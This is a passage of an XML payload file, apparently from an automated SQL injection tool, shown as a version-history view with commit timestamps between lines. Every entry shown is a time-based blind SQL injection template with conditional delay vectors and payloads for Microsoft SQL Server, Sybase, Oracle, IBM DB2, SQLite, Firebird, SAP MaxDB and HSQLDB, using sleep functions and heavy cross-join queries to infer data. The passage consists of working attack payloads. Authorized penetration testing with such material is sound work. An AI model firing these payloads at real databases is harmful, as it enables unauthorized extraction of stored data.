<vector > OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>
2015-02-18 13:13:44 +03:00
<comment > --</comment>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-03-03 17:22:20 +03:00
<title > Oracle AND time-based blind</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
2015-03-03 17:22:20 +03:00
<level > 1</level>
<risk > 1</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-03-03 17:22:20 +03:00
<vector > AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
2015-03-03 17:22:20 +03:00
<time > [SLEEPTIME]</time>
2015-02-18 13:13:44 +03:00
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > Oracle</dbms>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-03-03 17:22:20 +03:00
<title > Oracle OR time-based blind</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
2015-03-03 17:22:20 +03:00
<level > 1</level>
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-03-03 17:22:20 +03:00
<vector > OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
<title > Oracle AND time-based blind (comment)</title>
<stype > 5</stype>
<level > 4</level>
<risk > 1</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-03-03 17:22:20 +03:00
<where > 1</where>
<vector > AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
<request >
<payload > AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
2015-02-18 13:13:44 +03:00
<comment > --</comment>
</request>
<response >
2015-03-03 17:22:20 +03:00
<time > [SLEEPTIME]</time>
2015-02-18 13:13:44 +03:00
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > Oracle</dbms>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-03-03 17:22:20 +03:00
<title > Oracle OR time-based blind (comment)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
2015-03-03 17:22:20 +03:00
<level > 4</level>
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-03-03 17:22:20 +03:00
<vector > OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
<comment > --</comment>
2015-02-18 13:13:44 +03:00
</request>
<response >
2015-03-03 17:22:20 +03:00
<time > [SLEEPTIME]</time>
2015-02-18 13:13:44 +03:00
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > Oracle</dbms>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-03-03 17:22:20 +03:00
<title > Oracle AND time-based blind (heavy query)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
2015-03-03 17:22:20 +03:00
<level > 2</level>
2015-02-18 13:13:44 +03:00
<risk > 2</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-03-03 17:22:20 +03:00
<vector > AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > Oracle</dbms>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-03-03 17:22:20 +03:00
<title > Oracle OR time-based blind (heavy query)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
2015-03-03 17:22:20 +03:00
<level > 2</level>
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-03-03 17:22:20 +03:00
<vector > OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > Oracle</dbms>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-03-03 17:22:20 +03:00
<title > Oracle AND time-based blind (heavy query - comment)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 5</level>
<risk > 2</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-03-03 17:22:20 +03:00
<vector > AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
2015-02-18 13:13:44 +03:00
<comment > --</comment>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > Oracle</dbms>
2015-02-18 13:13:44 +03:00
</details>
</test>
2015-03-03 17:22:20 +03:00
2015-02-18 13:13:44 +03:00
<test >
2015-03-03 17:22:20 +03:00
<title > Oracle OR time-based blind (heavy query - comment)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
2015-03-03 17:22:20 +03:00
<level > 5</level>
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-03-03 17:22:20 +03:00
<vector > OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
<comment > --</comment>
2015-02-18 13:13:44 +03:00
</request>
<response >
2015-03-03 17:22:20 +03:00
<time > [DELAYED]</time>
2015-02-18 13:13:44 +03:00
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > Oracle</dbms>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-03-03 17:22:20 +03:00
<title > IBM DB2 AND time-based blind (heavy query)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
2015-03-03 17:22:20 +03:00
<level > 3</level>
2015-02-18 13:13:44 +03:00
<risk > 2</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-03-03 17:22:20 +03:00
<vector > AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > IBM DB2</dbms>
2015-02-18 13:13:44 +03:00
</details>
</test>
2015-03-03 17:22:20 +03:00
2015-02-18 13:13:44 +03:00
<test >
2015-03-03 17:22:20 +03:00
<title > IBM DB2 OR time-based blind (heavy query)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
2015-03-03 17:22:20 +03:00
<level > 3</level>
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-03-03 17:22:20 +03:00
<vector > OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
2015-03-03 17:22:20 +03:00
<time > [DELAYED]</time>
2015-02-18 13:13:44 +03:00
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > IBM DB2</dbms>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-03-03 17:22:20 +03:00
<title > IBM DB2 AND time-based blind (heavy query - comment)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 5</level>
<risk > 2</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-03-03 17:22:20 +03:00
<vector > AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
2015-02-18 13:13:44 +03:00
<comment > --</comment>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > IBM DB2</dbms>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-03-03 17:22:20 +03:00
<title > IBM DB2 OR time-based blind (heavy query - comment)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
2015-03-03 17:22:20 +03:00
<level > 5</level>
2015-02-18 13:13:44 +03:00
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-03-03 17:22:20 +03:00
<where > 1</where>
<vector > OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
<comment > --</comment>
2015-02-18 13:13:44 +03:00
</request>
<response >
2015-03-03 17:22:20 +03:00
<time > [DELAYED]</time>
2015-02-18 13:13:44 +03:00
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > IBM DB2</dbms>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-03-03 17:22:20 +03:00
<title > SQLite > 2.0 AND time-based blind (heavy query)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
2015-03-03 17:22:20 +03:00
<level > 3</level>
<risk > 2</risk>
2018-09-06 01:16:59 +03:00
<clause > 1,8,9</clause>
2015-03-03 17:22:20 +03:00
<where > 1</where>
<vector > AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
2015-03-03 17:22:20 +03:00
<time > [DELAYED]</time>
2015-02-18 13:13:44 +03:00
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > SQLite</dbms>
<dbms_version > > 2.0</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-03-03 17:22:20 +03:00
<title > SQLite > 2.0 OR time-based blind (heavy query)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
2015-03-03 17:22:20 +03:00
<level > 3</level>
2015-02-18 13:13:44 +03:00
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,9</clause>
2015-03-03 17:22:20 +03:00
<where > 1</where>
<vector > OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
2015-03-03 17:22:20 +03:00
<time > [DELAYED]</time>
2015-02-18 13:13:44 +03:00
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > SQLite</dbms>
<dbms_version > > 2.0</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-03-03 17:22:20 +03:00
<title > SQLite > 2.0 AND time-based blind (heavy query - comment)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
2015-03-03 17:22:20 +03:00
<level > 5</level>
<risk > 2</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,9</clause>
2015-03-03 17:22:20 +03:00
<where > 1</where>
<vector > AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
<comment > --</comment>
2015-02-18 13:13:44 +03:00
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > SQLite</dbms>
<dbms_version > > 2.0</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-03-03 17:22:20 +03:00
<title > SQLite > 2.0 OR time-based blind (heavy query - comment)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
2015-03-03 17:22:20 +03:00
<level > 5</level>
2015-02-18 13:13:44 +03:00
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,9</clause>
2015-03-03 17:22:20 +03:00
<where > 1</where>
<vector > OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
<comment > --</comment>
2015-02-18 13:13:44 +03:00
</request>
<response >
2015-03-03 17:22:20 +03:00
<time > [DELAYED]</time>
2015-02-18 13:13:44 +03:00
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > SQLite</dbms>
<dbms_version > > 2.0</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-03-19 15:09:43 +03:00
<title > Firebird > = 2.0 AND time-based blind (heavy query)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 4</level>
2015-03-03 17:22:20 +03:00
<risk > 2</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,9</clause>
2015-03-03 17:22:20 +03:00
<where > 1</where>
<vector > AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > Firebird</dbms>
<dbms_version > > = 2.0</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-03-19 15:09:43 +03:00
<title > Firebird > = 2.0 OR time-based blind (heavy query)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
2015-03-03 17:22:20 +03:00
<level > 4</level>
2015-02-18 13:13:44 +03:00
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,9</clause>
2015-03-03 17:22:20 +03:00
<where > 1</where>
<vector > OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > Firebird</dbms>
<dbms_version > > = 2.0</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-03-19 15:09:43 +03:00
<title > Firebird > = 2.0 AND time-based blind (heavy query - comment)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
2015-03-03 17:22:20 +03:00
<level > 5</level>
<risk > 2</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,9</clause>
2015-03-03 17:22:20 +03:00
<where > 1</where>
<vector > AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
<request >
<payload > AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>
<comment > --</comment>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > Firebird</dbms>
<dbms_version > > = 2.0</dbms_version>
</details>
</test>
<test >
2015-03-19 15:09:43 +03:00
<title > Firebird > = 2.0 OR time-based blind (heavy query - comment)</title>
2015-03-03 17:22:20 +03:00
<stype > 5</stype>
<level > 5</level>
2015-02-18 13:13:44 +03:00
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,9</clause>
2015-03-03 17:22:20 +03:00
<where > 1</where>
<vector > OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>
<comment > --</comment>
2015-02-18 13:13:44 +03:00
</request>
<response >
2015-03-03 17:22:20 +03:00
<time > [DELAYED]</time>
2015-02-18 13:13:44 +03:00
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > Firebird</dbms>
<dbms_version > > = 2.0</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-03-03 17:22:20 +03:00
<title > SAP MaxDB AND time-based blind (heavy query)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 4</level>
2015-03-03 17:22:20 +03:00
<risk > 2</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-03-03 17:22:20 +03:00
<where > 1</where>
<vector > AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > SAP MaxDB</dbms>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-03-03 17:22:20 +03:00
<title > SAP MaxDB OR time-based blind (heavy query)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 4</level>
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-03-03 17:22:20 +03:00
<where > 1</where>
<vector > OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > SAP MaxDB</dbms>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-03-03 17:22:20 +03:00
<title > SAP MaxDB AND time-based blind (heavy query - comment)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 5</level>
2015-03-03 17:22:20 +03:00
<risk > 2</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-03-03 17:22:20 +03:00
<where > 1</where>
<vector > AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>
<comment > --</comment>
2015-02-18 13:13:44 +03:00
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > SAP MaxDB</dbms>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
<title > SAP MaxDB OR time-based blind (heavy query - comment)</title>
<stype > 5</stype>
2015-03-03 17:22:20 +03:00
<level > 5</level>
2015-02-18 13:13:44 +03:00
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-03-03 17:22:20 +03:00
<where > 1</where>
2015-02-18 13:13:44 +03:00
<vector > OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
<request >
<payload > OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>
2015-03-03 17:22:20 +03:00
<comment > --</comment>
2015-02-18 13:13:44 +03:00
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > SAP MaxDB</dbms>
</details>
</test>
<test >
2015-03-03 17:22:20 +03:00
<title > HSQLDB > = 1.7.2 AND time-based blind (heavy query)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 4</level>
2015-03-03 17:22:20 +03:00
<risk > 2</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-03-03 17:22:20 +03:00
<where > 1</where>
<vector > AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
2015-03-03 17:22:20 +03:00
<time > [SLEEPTIME]</time>
2015-02-18 13:13:44 +03:00
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > HSQLDB</dbms>
<dbms_version > > = 1.7.2</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
2015-03-03 17:22:20 +03:00
2015-02-18 13:13:44 +03:00
<test >
<title > HSQLDB > = 1.7.2 OR time-based blind (heavy query)</title>
<stype > 5</stype>
<level > 4</level>
2015-03-03 17:22:20 +03:00
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
<vector > OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
<request >
<payload > OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > HSQLDB</dbms>
<dbms_version > > = 1.7.2</dbms_version>
</details>
</test>
<test >
2015-03-03 17:22:20 +03:00
<title > HSQLDB > = 1.7.2 AND time-based blind (heavy query - comment)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 5</level>
<risk > 2</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-03-03 17:22:20 +03:00
